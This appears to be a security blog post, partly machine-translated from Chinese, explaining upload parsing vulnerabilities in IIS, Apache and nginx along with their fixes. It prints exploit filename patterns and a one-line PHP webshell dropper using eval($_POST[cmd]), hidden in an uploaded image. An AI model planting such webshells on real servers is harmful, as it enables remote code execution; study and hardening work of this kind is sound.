Unsafe file download and upload - The server upload vulnerability of Parsing Vulnerability

Server upload vulnerability of Parsing Vulnerability

Upload loopholes IIS5.x-6.x Parsing Vulnerability

Use iis5.x-6.x version of the server, mostly Server Windows
2003, more ancient site, developed statements generally asp; the parsing vulnerability can only be resolved asp files, not parse aspx file.

Directory parsing (6.0)

		形式:www.xxx.com/xx.asp/xx.jpg
		原理: 服务器默认会把.asp,.asa目录下的文件都解析成asp文件。

File parsing

		形式:www.xxx.com/xx.asp;.jpg
		原理:服务器默认不解析;号后面的内容,因此xx.asp;.jpg便被解析成asp文件了。

Parsing the file type

		IIS6.0 默认的可执行文件除了asp还包含这三种 :
			/test.asa
			/test.cer
			/test.cdx

Rehabilitation program

		1.目前尚无微软官方的补丁,可以通过自己编写正则,阻止上传xx.asp;.jpg类型的文件名。
		2.做好权限设置,限制用户创建文件夹。

Apache parsing vulnerability upload loopholes

Vulnerabilities principle

Rule Apache parse the file is from right to left to start parsing to determine if the suffix unrecognized file parsing, and then be left to judge. For example test.php.owf.rar
".owf" and ".rar" suffix two unrecognizable parsing apache, apache will be parsed into the oldboy.php.owf.rar php.

Vulnerability form

		www.xxxx.xxx.com/test.php.php123

The remaining configuration issues leading to vulnerability

(1) If there is such a line configuration AddHandler php5-script .php in the Apache conf in
this case as long as the file name contains .php file name is test2.php.jpg even with php will be performed.
(2) if there is such a line disposed in the Apache conf AddType application / x-httpd-php .jpg even if the extension is jpg, php can be performed in the same manner.

Rehabilitation program

		1.apache配置文件,禁止.php.这样的文件执行,配置文件里面加入
<Files ~.(php.|php3.)>
        Order Allow,Deny
        Deny from all
</Files>

2. pseudo-static to solve this problem, override similar .php. * Such a document, open the apache httpd.conf find LoadModule rewrite_module modules / mod_rewrite.so
the number # removed, restart apache, built on the site's root directory. htaccess file, as follows:

	<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule .(php.|php3.) /index.php
RewriteRule .(pHp.|pHp3.) /index.php
RewriteRule .(phP.|phP3.) /index.php
RewriteRule .(Php.|Php3.) /index.php
RewriteRule .(PHp.|PHp3.) /index.php
RewriteRule .(PhP.|PhP3.) /index.php
RewriteRule .(pHP.|pHP3.) /index.php
RewriteRule .(PHP.|PHP3.) /index.php
</IfModule>

nginx upload vulnerability of Parsing Vulnerability

Vulnerabilities principle

		  Nginx默认是以CGI的方式支持PHP解析的,普遍的做法是在Nginx配置文件中通过正则匹配设置SCRIPT_FILENAME。当访问www.xx.com/phpinfo.jpg/1.php这个URL时,$fastcgi_script_name会被设置为“phpinfo.jpg/1.php”,然后构造成SCRIPT_FILENAME传递给PHP CGI,但是PHP为什么会接受这样的参数,并将phpinfo.jpg作为PHP文件解析呢?这就要说到fix_pathinfo这个选项了。 如果开启了这个选项,那么就会触发在PHP中的如下逻辑:
			PHP会认为SCRIPT_FILENAME是phpinfo.jpg,而1.php是PATH_INFO,所以就会将phpinfo.jpg作为PHP文件来解析了

Vulnerability form

		www.xxxx.com/UploadFiles/image/1.jpg/1.php
		www.xxxx.com/UploadFiles/image/1.jpg%00.php
		www.xxxx.com/UploadFiles/image/1.jpg/%20\0.php
		xxx.jpg%00.php (Nginx <8.03 空字节代码执行漏洞)
	另外一种手法:上传一个名字为test.jpg,以下内容的文件。


<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
			然后访问test.jpg/.php,在这个目录下就会生成一句话木马shell.php。

Rehabilitation program

		1.修改php.ini文件,将cgi.fix_pathinfo的值设置为0;
		2.在Nginx配置文件中添加以下代码:
		if ( $fastcgi_script_name ~ ..*/.*php ) 
{
return 403;
}

This line means that when the URL matched to similar test.jpg / a.php will return an error code 403. Upload loopholes IIS7.5 8 Parsing Vulnerability
vulnerability IIS7.5 with nginx similar, are due php configuration file, open the cgi.fix_pathinfo, which is not nginx or iis7.5 vulnerability itself.
https://www.xp.cn/a.php/182.html
When installation is complete, php.ini in default cgi.fix_pathinfo = 1, its time to visit, when the URL path extension will add .php as a php file is parsed, the resulting vulnerabilities
Note: Before the actual test, I found loopholes and no later discovered to be set off FastCGI, that seems to be used to process the data file
when the defense put cgi. fix_pathinfo = 0, and open FastCGI so, since you can play high-level point
to create cmd.txt file contents

<?php
				fputs(fopen('shell.php','w'),'<?php  phpinfo();?>');
				//创建新的文件
				?>
		保存后,重命名为cmd.jpg 文件
		再次进行访问

note

			当phpstudy切换回去的时候,不一定可以运行,需要进行再配置
Published 80 original articles · won praise 8 · views 4213

Guess you like

Origin blog.csdn.net/weixin_43079958/article/details/105377290